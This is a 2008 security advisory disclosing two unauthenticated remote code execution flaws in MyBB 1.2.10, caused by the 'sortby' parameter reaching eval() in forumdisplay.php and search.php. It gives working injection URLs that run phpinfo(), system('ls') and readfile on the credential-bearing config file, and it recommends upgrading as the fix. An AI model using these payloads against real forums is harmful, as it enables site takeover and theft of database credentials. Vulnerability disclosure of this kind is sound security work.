[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10 ======================================================================== ======= Author: Janek Vind "waraxe" Independent discovery: koziolek Date: 16. January 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-61.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ MyBB is a discussion board that has been around for a while; it has evolved from other bulletin boards into the forum package it is today. Therefore, it is a professional and efficient discussion board, developed by an active team of developers. Vulnerabilities discovered ======================================================================== ======= 1. Remote Code Execution in "forumdisplay.php": ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Precondition: valid forum "fid" must be known. Attacker doesn't need to have any privileges in mybb installation to be successful in attack. Proof-Of-Concept request: http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby=' ... and we will see error message: Parse error: syntax error, unexpected ''', expecting ']' in C:\apache_wwwroot\mybb.1.2.10\forumdisplay.php(407) : eval()'d code on line 1 Problematic piece of code is related to "eval()" function: eval("\$orderarrow['$sortby'] = \"". $templates->get("forumdisplay_orderarrow")."\";"); Example attacks: http://localhost/mybb.1.2.10/forumdisplay.php?fid=2 &sortby='];phpinfo();exit;// http://localhost/mybb.1.2.10/forumdisplay.php?fid=2 &sortby='];system('ls');exit;// http://localhost/mybb.1.2.10/forumdisplay.php?fid=2 &sortby='];readfile('inc/config.php');exit;// 2. Remote Code Execution in "search.php": ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Precondition: search "sid" must be known - but that's trivial task. Attacker doesn't need to have any privileges in mybb installation to be successful in attack. http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby=' Parse error: syntax error, unexpected ''', expecting ']' in C:\apache_wwwroot\mybb.1.2.10\search.php(141) : eval()'d code on line 1 Problematic is exactly same piece of code, as in previous case: eval("\$orderarrow['$sortby'] = \"". $templates->get("forumdisplay_orderarrow")."\";"); Example attacks: http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby='];phpinfo();exit;// http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby='];system('ls');exit;// http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby='];readfile('inc/config.php');exit;// Both remote code execution security holes are very dangerous and can be used by attacker to complete takeover the website and possible total compromise of webserver. How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Download MyBB new version 1.2.11 as soon as possible! Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and anyone else who know me! Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ come2waraxe (at) yahoo (dot) com [email concealed] Janek Vind "waraxe" Homepage: http://www.janekvind.com/ Waraxe forum: http://www.waraxe.us/forums.html ---------------------------------- [ EOF ] ------------------------------------